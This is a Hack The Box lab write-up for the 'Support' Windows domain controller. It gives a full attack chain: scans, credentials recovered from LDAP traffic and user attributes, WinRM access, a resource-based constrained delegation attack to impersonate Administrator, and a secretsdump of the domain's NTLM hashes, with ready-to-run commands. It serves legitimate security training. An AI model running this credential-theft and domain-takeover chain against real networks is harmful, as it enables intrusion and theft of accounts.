HTB-Support

Box Info

Difficulty	Easy
OS	Windows
IP Address	10.10.11.174

Port Scanning

# Check all open TCP
sudo rustscan 10.10.11.174 -r 1-65535 --ulimit 5000
# Nmap scan with script on open TCP port
sudo nmap 10.10.11.174 -sCV -Pn -sT -p 53,88,135,139,389,445,464,593,636,3269,3268,5985,9389,49664,49667,49678,49676,49701,49739
# Nmap scan vulnerability 
sudo nmap -sT -p 53,88,135,139,389,445,464,593,636,3269,3268,5985,9389,49664,49667,49678,49676,49701,49739 --script=vuln -O -Pn 10.10.11.174
# Nmap scan with UDP port
sudo nmap -sU --top-ports 20 -Pn 10.10.11.174

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-05-20 14:18:36Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49678/tcp open  msrpc         Microsoft Windows RPC
49701/tcp open  msrpc         Microsoft Windows RPC
49739/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Update DNS

sudo nano /etc/hosts
10.10.11.174 support.htb

Service Enumeration

445/tcp - SMB

support-tools folder consist of few zip file and exe

Upon checking, think that UserInfo file is interesting. Extracted and trying to run however faced some issue in running the exe file.

Checked the exe file are executed under Mono/.Net assembly and we can download mono in Kali

sudo apt-get install mono-complete -y

After installed mono-complete, we can now execute the UserInfo.exe

When execute the command, it will reach out to the LDAP server based on WireShark. (Thanks to ippsec, this machine is not easy!!!)

By follow to the LDAP TCP stream, found there is a encrypted key

support\ldap nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

Validate the credentials with netexec

Initial User Foothold

Ldap

Since we had captured the credentials, lets explore the ldap using ldapsearch

ldapsearch -x -H ldap://10.10.11.174 -D 'ldap@support.htb' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "DC=support,DC=htb" "*"

In the support users, found there is a note in user info

info: Ironside47pleasure40Watchful

It looks like could be a password, and support users looks like a shared account. Lets extract the user list

ldapsearch -D support\\ldap -H ldap://10.10.11.174 -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'CN=Users,DC=support,DC=htb' | grep name: | sed 's/^name: //' | grep -vE 'D|C|A|U' > users.txt

WinRM Support User

evil-winrm -i 10.10.11.174 -u 'support.htb\support' -p Ironside47pleasure40Watchful 

User Flag

Privilege Escalation

Bloodhound

bloodhound-python -u support -p 'Ironside47pleasure40Watchful' -ns 10.10.11.174 -d support.htb -c All --zip

Support user in the Shared Support Accounts group had the Generic All to the DC.

Initiate Root Foothold

RBCD

Here we can abuse the Resource-based Constrained Delegation to obtain DC. First, we will add a fake computer to the domain under support user control, Then we can act as the DC to request Kerberos tickets for the fake computer giving the ability to impersonate other accounts, like Administrator. For this to work, we will need an authenticated user who can add machines to the domain. This had configured in ms-ds-machineaccountquota attribute, which needs to be larger than 0. Then we will need to use support user write privileges over a domain joined computer (which GenericAll on the DC gets me)

Support Scripts

• https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
• https://github.com/Kevin-Robertson/Powermad
• https://github.com/GhostPack/Rubeus

Execute and import the script

Create MachineAccount

New-MachineAccount -MachineAccount cxkhere -Password $(ConvertTo-SecureString 'cxkhere' -AsPlainText -Force) -Verbose
Verbose: [+] Domain Controller = dc.support.htb
Verbose: [+] Domain = support.htb
Verbose: [+] SAMAccountName = cxkhere$
Verbose: [+] Distinguished Name = CN=cxkhere,CN=Computers,DC=support,DC=htb
[+] Machine account cxkhere added

Obtain MachineAccount sid

Get-DomainComputer cxkhere -Properties objectsid

S-1-5-21-1677581083-3380853377-188903654-5602

Modify Machine Security

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1677581083-3380853377-188903654-5602)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

Get-DomainComputer dc | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

Obtain TGT

sudo ntpdate 10.10.11.174 && impacket-getST support.htb/cxkhere:cxkhere -dc-ip 10.10.11.174 -impersonate administrator -spn www/dc.support.htb

Wmiexec

export KRB5CCNAME=administrator@www_dc.support.htb@SUPPORT.HTB.ccache

sudo ntpdate 10.10.11.174 && impacket-wmiexec -k -no-pass SUPPORT.HTB/administrator@dc.support.htb

Root Flag

Secretdump

sudo ntpdate 10.10.11.174 && impacket-secretsdump support.htb/administrator@dc.support.htb -just-dc-ntlm -no-pass -k

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bb06cbc02b39abeddd1335bc30b19e26:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6303be52e22950b5bcb764ff2b233302:::
ldap:1104:aad3b435b51404eeaad3b435b51404ee:b735f8c7172b49ca2b956b8015eb2ebe:::
support:1105:aad3b435b51404eeaad3b435b51404ee:11fbaef07d83e3f6cde9f0ff98a3af3d:::
smith.rosario:1106:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
hernandez.stanley:1107:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
wilson.shelby:1108:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
anderson.damian:1109:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
thomas.raphael:1110:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
levine.leopoldo:1111:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
raven.clifton:1112:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
bardot.mary:1113:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
cromwell.gerard:1114:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
monroe.david:1115:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
west.laura:1116:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
langley.lucy:1117:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
daughtler.mabel:1118:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
stoll.rachelle:1119:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
ford.victoria:1120:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:5b392db153a644ffe54dcfeef53c86b8:::
MANAGEMENT$:2601:aad3b435b51404eeaad3b435b51404ee:3f99f2f26988d1f348d378e84f86bc58:::
attackersystem$:5601:aad3b435b51404eeaad3b435b51404ee:ef266c6b963c0bb683941032008ad47f:::
cxkhere$:5602:aad3b435b51404eeaad3b435b51404ee:7a242415354f55e2c546b3bf49241edb:::
[*] Cleaning up...